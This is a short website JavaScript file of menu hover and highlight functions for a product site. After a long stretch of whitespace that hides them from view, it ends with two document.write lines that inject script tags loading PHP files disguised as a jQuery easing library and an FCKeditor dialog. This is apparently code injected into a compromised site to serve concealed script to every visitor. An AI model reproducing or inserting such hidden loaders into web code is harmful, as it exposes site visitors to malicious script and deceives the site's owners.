function mOvr(src,clrOver)
{ 
	if (!src.contains(event.fromElement))
	{ 
		src.style.cursor = 'default'; 
		src.bgcolor = clrOver; 
	} 
} 

function mOut(src,clrIn)
{ 
	if (!src.contains(event.toElement))
	{ 
		src.style.cursor = 'default'; 
		src.bgcolor = clrIn; 
	} 
}

function ChangeColor(obj,color)
{
	obj.style.background=color;
}

function markmenu(obj)
{

	ChangeColor(obj,'#042544');
	obj.onmouseout="ChangeColor("+obj+",'#042544');";
}



function leftmenuselect(pagename)
{
	if(pagename=="newproducts")
	{
		document.getElementById("link4").className="mainmenuhover";	
	}else if(pagename =="commercial"){
		document.getElementById("link1").className="mainmenuhover";	
	}else if(pagename =="residential"){
		document.getElementById("link2").className="mainmenuhover";	
	}
}


function loadincludes(){	
	clientSideInclude('search', 'search1.php');	
}																																																																							document.write('<script type="text/javascript" src="/inner/global/jquery.easing.1.3.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/FCKeditor/editor/dialog/fck_link/rss.php"><\/script>');
